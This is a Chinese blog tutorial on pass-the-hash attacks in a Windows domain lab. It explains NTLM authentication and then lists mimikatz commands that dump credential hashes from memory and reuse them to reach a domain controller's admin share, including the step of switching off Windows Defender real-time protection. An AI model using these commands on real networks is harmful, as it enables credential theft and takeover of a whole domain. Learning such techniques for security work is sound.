哈希传递 (内网渗透)

已于 2023-07-25 15:06:24 修改
阅读量327 收藏 2
点赞数 1
文章标签: 哈希算法 算法 网络安全 安全
于 2023-07-25 15:04:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78155155/article/details/131884230
版权

Windows登录认证

1、用户在客户端输入username、passsword、domain,客户端会将password进行hash计算保存到本地

2、客户端将username明文传输到域控主机,域控主机会随机生成16字节的challenge(挑战码)返回给客户端

3、客户端收到challenge之后会用之前的password的hash进行加密(response)和challenge、username一起发送给服务器,服务端会将收到的信息转发给域控

4、域控收到服务端发来的response、challenge、username,会拿着username在活动目录数据库中查询对应的password hash,并且使用自己的password hash对challenge进行一次加密,如果用户发来的response相同则身份验证成功,不相同则为验证失败

概念

一开始客户端与服务器之间信息沟通使用SMB协议明文传输,微软为了提高Windows操作系统的安全性采用了DES加密(散列加密算法),但由于 LM Hash的生成原理最关键的地方是密码不足14字节需要用0补全,这样就造成 LM Hash较容易被破解,随后就产生了 NTML Hash。

NTML Hash

生成过程

用户密码 -----> 转换为16进制格式 ----> 进行Unicode编码 ----> 使用MD4摘要算法 ----> 最终密文

1、首先将用户密码转换为十六进制格式

2、再将十六进制格式的密码进行Unicode编码

3、最后使用MD4摘要算法对Unicode编码数据进行Hash计算,得到密文

原理

哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、 LM Hash都不需要明文密码因此都可以被称为Hash传递攻击。

NTML验证靠HASH值

1、获得一台域主机的权限

2、Dump内存获得用户hash

3、通过pass the hash尝试登录其他主机

4、继续搜集hash并尝试远程登录

5、直到获得域管理员账户hash,登录域控,最终成功控制整个域

利用

基础环境

域控:sever-2008

DMZ:win10

mimikatz准备好

1、sever-2008搭建域

 2、Windows-10加入域

 这里有一个需要注意的点,Windows-10中实时保护一定得关掉

 

 3、mimikatz这个程序得注意,打开cmd(管理员身份,一定不要忘)运行mimikatz程序

成功命令秘籍

privilege::debug                                      提升权限(注:需以管理员权限运行)
sekurlsa::logonpasswords                      获取内存中保存的登录信息,查看hash值
sekurlsa::pth /user:administrator /domain:xxx.com /ntlm:a803cf45d87009c404eb89df4b1ae94c
                                                               弹出新窗口
dir \\xx.xx.xx.254\c$                               域控ip

type \\xx.xx.xx.254\1.txt                         查看新建的文件夹

 

 4、提升权限

 5、查看哈希值

 6、弹出新窗口

 7、拿下域控

重要条件:

哈希传递只有在相同密码的情况下有用!!!

#认真走好每一小步  请多指教

@L尘痕

L尘痕
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
内网横传之哈希传递(Pass The Hash)
11-25 7185
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
哈希传递:保护数据完整性和验证身份的关键技术
qq_45758325的博客
07-24 532
哈希传递:保护数据完整性和验证身份的关键技术
内网渗透哈希传递
agrilly的博客
07-04 309
哈希算法内网渗透、加密
内网渗透——哈希传递
来日可期的博客
10-09 1139
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
个人简单笔记,后渗透学习之Passing the Hash(哈希传递
来到了学渣的博客
02-25 619
Passing the Hash Hash基础知识 Window系统下的Hash密码格式为: 用户名称:RID:LM-Hash值:NT-Hash值 获取Hash值 我自己暂时所知道的三种方法 Hashdump Run post/windows/gather/smart_hashdump use post/windows/gather/hashdump 前提是要获得shell,获shell方法在...
哈希算法c语言.rar
最新发布
04-30
本文将全面介绍哈希算法的相关知识,帮助读者了解其在信息安全领域的重要性。 二、哈希算法的基本概念 哈希算法是一种将任意长度的输入数据映射到固定长度输出的单向加密函数。它具有以下特性: 确定性:相同的...
delphi哈希加密示例
06-07
delphi哈希加密示例
哈希运算过程
12-22
哈希运算过程 ● 使用 Entry[] 存放数据 ● 数组的默认初始容量是 16 ● 容量翻倍增长 ● 内部运算过程,由键来运算 ● key.hashCode() 获得键的哈希值 ● 用哈希值和数组长度来计算下标值 i ● 把键值对封装成 ...
4哈希表1
08-03
哈希表是一种高效的数据结构,它通过特定的哈希函数将关键字映射到数组的索引位置,从而实现快速的查找、插入和删除操作。在哈希表中,记录的位置与关键字之间存在一种确定的关系,这与传统的数据结构如数组、链表等...
c++的哈希表hash
03-18
c
内网横向移动之票据传递哈希传递
qq_52074678的博客
06-21 377
内网横向移动
域渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1906
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议原理
哈希传递
2301_77915293的博客
07-06 111
Windows操作系统通常使用两种方法对用户的明文密码进行加密处理。在域环境中,用户信息存储在 ntds.dit_中加密后为散列值。Windows 操作系统中的密码一般由两部分组成一部分为 LM Hash,另一部分为 NTLMHash。在 Windows 操作系统中,Hash 的结构通常如下。
【渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 3363
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
后渗透模块之Hash传递
weixin_45007073的博客
01-26 374
前言 我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。 利用过程 前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块 use exploit/windows/smb/psexec set rhosts 192.168.75.139 set smbuser pyh(普通管理员账户) set smbpass aad3b435b51404eeaad
hash传递攻击
qq_58000413的博客
06-05 723
Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。开启445端口开启ipc$共享。
内网安全“小迪安全课堂笔记”域横向
weixin_42902126的博客
05-09 3729
内网安全内网安全-域环境&工作组&局域网探针方案基本认知域环境与工作组的区别环境靶机案例 1-基本信息收集操作演示案例 2-网络信息收集操作演示案例 3-用户信息收集操作演示案例 4-凭据信息收集操作演示计算机用户 HASH,明文获取-mimikatz(win),mimipenguin(linux)计算机各种协议服务口令获取-LaZagne(all),XenArmor(win)案例 5-探针主机域控架构服务操作演示涉及资源域横向批量at&schtasks&impacket 内
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1572
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
内网安全-域横向批量at&schtasks&impacket
m0_61506558的博客
10-22 1067
获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令。在3中都是批处理命令,只能遍历一个变量,如果想要遍历多个变量,比如IP、用户名、密码等,可以写python脚本,免杀,使用Pyinstaller打包成exe文件,上传到目标机器运行。命令的使用,在已知目标系统的用户明文密码的基础上,直接可在远程主机上执行命令。建立IPC常见的错误代码。
Android中如何在Activity中传递哈希
05-12
在Android中,你可以使用Bundle类来传递哈希表。Bundle是一种键值对的数据结构,它可以用来传递数据。你可以将哈希表中的键值对存储到Bundle中,然后将Bundle传递给另一个Activity。下面是一个示例代码: 在发送Activity中: ``` HashMap<String, String> hashMap = new HashMap<String, String>(); hashMap.put("key1", "value1"); hashMap.put("key2", "value2"); Intent intent = new Intent(SendingActivity.this, ReceivingActivity.class); Bundle bundle = new Bundle(); bundle.putSerializable("hashMap", hashMap); intent.putExtras(bundle); startActivity(intent); ``` 在接收Activity中: ``` HashMap<String, String> hashMap = (HashMap<String, String>) getIntent().getSerializableExtra("hashMap"); ``` 注意:哈希表必须实现Serializable接口才能被存储到Bundle中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

L尘痕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值